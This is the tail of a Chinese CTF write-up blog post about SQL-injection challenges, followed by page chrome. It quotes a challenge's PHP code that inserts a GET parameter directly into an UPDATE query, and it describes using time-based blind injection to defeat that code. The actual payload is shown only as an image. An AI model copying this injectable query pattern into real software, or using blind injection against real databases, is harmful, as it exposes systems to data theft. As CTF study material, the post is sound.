prob_umaru_temp"</span>));</span><br><span class="line">  <span class="keyword">if</span>((!$realflag[flag]) || ($realflag[flag] != $tempflag[flag])) reset_flag();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>($realflag[flag] === $_GET[flag]) solve(<span class="string">"umaru"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>老感觉题目似曾相识，按照代码意思，就是猜得flag，但是只要猜错了就原来的flag就是替换掉。仔细分析代码的，第一次的tempflag取自于realflag,只是后面</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@mysql_query(<span class="meta-string">"update prob_umaru_temp set flag=&#123;<span class="variable">$_GET</span>[flag]&#125;"</span>)</span>;</span><br></pre></td></tr></table></figure>

<p>立即替换了,这里用了@,屏蔽了错误消息。然后我们就要在这动心思。我们要让这句话失效，同时因为又没有回显，看看过滤的字符，我们可以用时间盲注。然后就是构造语句。</p>
<p><img src="https://myndtt.github.io/images/11.png" alt="11"></p>
<p>ok 一切明了啦，就差写脚本。说实话，时间盲注要计算好时间，毕竟通信不是那么时效。</p>
<h2 id="0x06-总结"><a href="#0x06-总结" class="headerlink" title="0x06.总结"></a>0x06.总结</h2><p>做了这些个题目，总之在与数据库交互的地方，仅仅只用黑名单是很蠢的。各种被绕过。。。</p>
<p><img src="https://myndtt.github.io/images/12.png" alt="12"></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/10/26/几道sqli/">几道sql</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">myndtt</a></p>
        <p><span>发布时间:</span>2017-10-26, 16:21:53</p>
        <p><span>最后更新:</span>2019-09-22, 13:30:28</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/10/26/几道sqli/" title="几道sql">https://myndtt.github.io/2017/10/26/几道sqli/</a>
            <span class="copy-path" data-clipboard-text="原文: https://myndtt.github.io/2017/10/26/几道sqli/　　作者: myndtt" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2017/11/07/sniperoj-web-writeup/">
                    sniperoj some web writeup
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2017/10/22/url中的下划线/">
                    url中的下划线
                </a>
            </div>
        
    </nav>

  
   <!-- 添加打赏功能 只在文章详情中显示-->
     
      
     
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00.前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-渐悟"><span class="toc-number">2.</span> <span class="toc-text">0x01.渐悟</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-解决"><span class="toc-number">3.</span> <span class="toc-text">0x02.解决</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-新的风暴"><span class="toc-number">4.</span> <span class="toc-text">0x03.新的风暴</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-暂时"><span class="toc-number">5.</span> <span class="toc-text">0x04.暂时</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-阳光穿破黑夜"><span class="toc-number">6.</span> <span class="toc-text">0x05.阳光穿破黑夜</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-总结"><span class="toc-number">7.</span> <span class="toc-text">0x06.总结</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"几道sql　| myndtt || blog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    
        <section class="youyan" id="comments">
    <script>
        var loadComment = function(){
            var d = document, s = d.createElement('script');
            s.src = 'http://v2.uyan.cc/code/uyan.js?uid=2148375';
            (d.head || d.body).appendChild(s);
        }
    </script>
    
    <script> loadComment(); </script>

    <div id="uyan_frame"></div>
</section>
    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/11/07/sniperoj-web-writeup/" title="上一篇: sniperoj some web writeup">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2017/10/22/url中的下划线/" title="下一篇: url中的下划线">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/21/Openstack之keystone源代码简读一/">Openstack之keystone源代码简读一</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/22/Openstack之Glance源代码简读一/">Openstack之Glance源代码简读一</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/16/hadoop/">hadoop(笔记)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/29/无题-二/">无题(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/01/scrapy-浅分析-四/">scrapy 浅分析(四)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/01/scrapy-浅分析-三/">scrapy 浅分析(三)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/31/scrapy-浅分析-二/">scrapy 浅分析(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/30/scrapy-浅分析-一/">scrapy 浅分析(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/22/flask-v0-1源码简单分析/">flask v0.1源码简单分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/17/无题-一/">无题（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/19/php的session反序列化/">php的session反序列化</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/07/parse-url/">parse_url</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/04/problem&solution/">problem&solution</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/14/iamsowly/">solveme.kr-iamsowly</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/09/一道anti sql/">从一道anti sql题讲起</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/the-in-ubuntu/">the “*” in ubuntu</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/07/sniperoj-web-writeup/">sniperoj some web writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/26/几道sqli/">几道sql</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/22/url中的下划线/">url中的下划线</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/20/php两道题/">php两道题</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/19/某年某月的某一天/">某年某月的某一天</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/17/小游戏 7 8 /">小游戏-7,8</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/08/小游戏 5，6/">小游戏5,6</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/01/小游戏 1 2 3 4/">小游戏1,2,3,4</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/结束&开始/">一段结束</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/Python 网易云签到/">python-网易云音乐签到，词云</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/26/实验吧 ctf 编程题(六)/">实验吧 CTF 编程题 （六）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/24/实验吧 ctf 编程题(五)/">实验吧 CTF 编程题（五）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/24/实验吧 ctf 编程题(四)/">实验吧 CTF 编程题（四）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(三)/">实验吧 CTF 编程题（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(二)/">实验吧 CTF 编程题（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(一)/">实验吧 CTF 编程题 （一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/22/Python-Django-别人轮子修改/">python Django别人的轮子修改</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/16/python-12306-查票/">python-12306-查票</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2017-2019 myndtt
            </div>
            <div class="footer-right">
                <a href="#" target="_blank" >没有你的天堂...</a> <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>